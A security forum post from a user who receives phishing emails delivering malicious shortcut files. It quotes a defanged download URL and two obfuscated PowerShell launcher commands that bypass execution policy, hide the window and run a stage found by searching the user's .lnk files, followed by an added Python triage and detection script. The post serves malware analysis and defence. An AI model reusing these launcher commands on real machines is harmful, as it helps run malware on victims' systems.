All, hoping this shows up as the previous one ended up having no msg body in the post.

I have been receiving "targeted" malware emails over the last couple of months (targeted in that they have my company's address and main telephone number correctly listed in the email). Each email is an order confirmation with a hyperlink for the "order details". The link is to a zip file which each time contains a shortcut file which is a powershell cmd and a jpg file which for some reason is always marked as hidden.

The latest, which I reported a week ago but is still live, has a link to:

hXXps://rkbbeauty.com/.cabinet/838IZ46044-package-updated

The jpg is named "image_20180905_190126_22.jpg" and the shortcut "838IZ46044-package-updated.lnk".

The powershell cmd has changed from when I first reported it to:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c "&{powershell -w"in hi"d"den -c {$g=findstr /s dikona $env:userprofile\*.lnk;powershell -c $g}}"

which previously was:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no

What I was hoping someone would be able to shed some light on is what "dikona" or "glirote3" is. Thanks in advance
W60 | Sep 10th 2018
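The following triage script is an added example for readers of this thread; it is not part of W60's post and not code from the site. It takes the two shortcut command lines quoted above, strips the quote-splitting obfuscation (PowerShell joins adjacent string fragments, so po"wer"shel"l is read as powershell), and flags the behaviours a defender cares about: execution-policy bypass, hidden window, a nested PowerShell launch, and findstr /s over every .lnk in the user profile. That findstr call is what the marker word is for: findstr prints each line of each .lnk that contains "dikona" (or "glirote3" in the older sample), and the sample then hands that output straight to powershell -c, so the shortcut locates the text appended to its own file by searching for the marker. The extract_marker_lines helper shows how to pull such a line out of a suspect .lnk for reading rather than running it; the SAMPLE_LNK bytes are constructed for the example (a real LNK header followed by a harmless placeholder line) and stand in for a captured file.

```python
"""Triage helper for the findstr-over-*.lnk PowerShell launcher pattern (added example)."""
import re

# Command lines as quoted in the forum post (newer and older variant).
CMD_NEW = (r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c '
           r'"&{powershell -w"in hi"d"den -c {$g=findstr /s dikona $env:userprofile\*.lnk;'
           r'powershell -c $g}}"')
CMD_OLD = (r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c '
           r'$no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk '
           r'> $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; '
           r'start-process $no')


def normalize(cmd: str) -> str:
    """Undo quote-splitting for matching purposes.

    PowerShell concatenates adjacent string fragments, so dropping every double
    quote and collapsing whitespace yields the command as the parser sees it
    (an approximation that is good enough for indicator matching, not execution).
    """
    return re.sub(r"\s+", " ", cmd.replace('"', "")).lower()


# Behavioural indicators, matched against the normalized, lower-cased command.
INDICATORS = {
    "execution policy bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass"),
    "hidden window": re.compile(r"-w(?:in|indowstyle)?\s+hidden"),
    "findstr over *.lnk": re.compile(r"findstr\s+/s\s+\S+\s+\S*\\\*\.lnk"),
    "nested powershell": re.compile(r"powershell.*powershell"),
    "writes .ps1 to profile": re.compile(r">\s*\$env:userprofile\\\S+\.ps1"),
}

MARKER_RE = re.compile(r"findstr\s+/s\s+(\S+)\s+")


def triage(cmd: str) -> dict:
    """Return the normalized command, the indicators it trips, and the findstr marker (if any)."""
    norm = normalize(cmd)
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    m = MARKER_RE.search(norm)
    return {"normalized": norm, "indicators": hits, "marker": m.group(1) if m else None}


def extract_marker_lines(lnk_bytes: bytes, marker: str) -> list:
    """Return the raw lines of a .lnk file that contain the marker.

    This is the text findstr would print for that file (findstr also prefixes a
    path when searching several files; that prefix is omitted here). Reading the
    line out lets an analyst inspect the embedded stage without running it.
    """
    needle = marker.encode()
    return [line.decode("latin-1", "replace") for line in lnk_bytes.splitlines() if needle in line]


# Constructed sample: the standard ShellLinkHeader magic and CLSID, filler bytes
# in place of the real link structure, then a harmless placeholder line carrying
# the marker, mimicking how the searched-for text rides inside the shortcut file.
SAMPLE_LNK = (
    b"L\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F"
    + b"\x00" * 40
    + b"\r\ndikona; Write-Host 'CONSTRUCTED placeholder stage'\r\n"
)


if __name__ == "__main__":
    for label, cmd in (("new", CMD_NEW), ("old", CMD_OLD)):
        result = triage(cmd)
        print(f"[{label}] marker={result['marker']} indicators={result['indicators']}")
    print("marker lines in sample .lnk:", extract_marker_lines(SAMPLE_LNK, "dikona"))
```

Run on the two quoted commands, triage reports the marker words dikona and glirote3 and trips the bypass, hidden-window, nested-PowerShell and findstr-over-.lnk indicators for both; only the older variant also matches the write-to-.ps1 rule. A hunt rule built from the same idea (powershell.exe spawning findstr with /s and a *.lnk argument under the user profile) is a reasonable detection for this family, since the marker word changes between campaigns but the self-search does not.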